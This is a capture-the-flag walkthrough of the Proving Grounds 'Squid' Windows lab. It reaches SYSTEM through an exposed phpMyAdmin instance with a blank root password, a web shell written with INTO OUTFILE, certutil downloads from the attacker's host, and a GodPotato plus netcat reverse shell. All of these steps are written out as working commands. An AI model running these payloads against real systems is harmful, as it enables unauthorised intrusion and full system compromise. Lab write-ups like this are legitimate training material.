Squid

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

  • Again, autorecon bombarded me with open ports: 135, 139, 445, 3128, 49666, 49667

  • Port HTTP (3128) was running Squid, which turned out to be a proxy. After some (loads and loads of) searching, I found a CVE but no working PoC. Instead, Haktricks pointed me to spose.py, a Squid pivoting scanner. Running it revealed two additional open ports: 3306 and 8080.

Squid
Spose

Gaining Initial Access

  • To interact with them, I configured my browser proxy and started investigating.

Proxy Settings
  • 3306 was a MySQL service that just downloaded a dummy file.

  • 8080 was where things got interesting, phpMyAdmin was exposed!

  • Tried root with an empty password, and it worked. After checking the tables, nothing valuable popped up, so I decided to upload a shell using SQL.

PHP Info
  • First, I needed the web root directory. phpinfo() check came in handy and gave me the path. Now, I could upload my shell:

select '<?php system($_GET["cmd"]); ?>;' into outfile 'C:/wamp/www/shell.php';
Web Shell
  • With that, I now had a web shell. Time to get a full reverse shell:

http://192.168.155.189:8080/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.45.240%3A901%2Fshell.php
http://192.168.155.189:8080/shell.php?cmd=.%2Fshell.php
Reverse Shell

Privilege Escalation

  • After getting a foothold, I checked user privileges, uploaded WinPeas, and looked around, but nothing obvious stood out. Then after searching online, I found a trick that lets Service accounts regain their old privileges.

  • Downloaded and ran the PoC, FullPowers.exe, which enabled SeImpersonatePrivilege alongside other privileges.

Gaining Privileges
  • With this, I could use GodPotato to escalate to SYSTEM:

certutil -urlcache -split -f http://192.168.45.240:901/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.240 9100"
  • And just like that, I was SYSTEM.

Privilege Escalation

Lessons Learned

  • Default creds still work in 2024.

  • Sometimes, searching for a working PoC is a waste of time, pivoting to alternative tools (like spose.py) can be faster.

  • phpMyAdmin + empty root password = instant win. Upload a web shell right away!

  • Web shells are still one of the easiest ways to pivot into a full reverse shell.

  • When you get a service account with limited privileges, service account privilege restoration can be a path to explore.

Last updated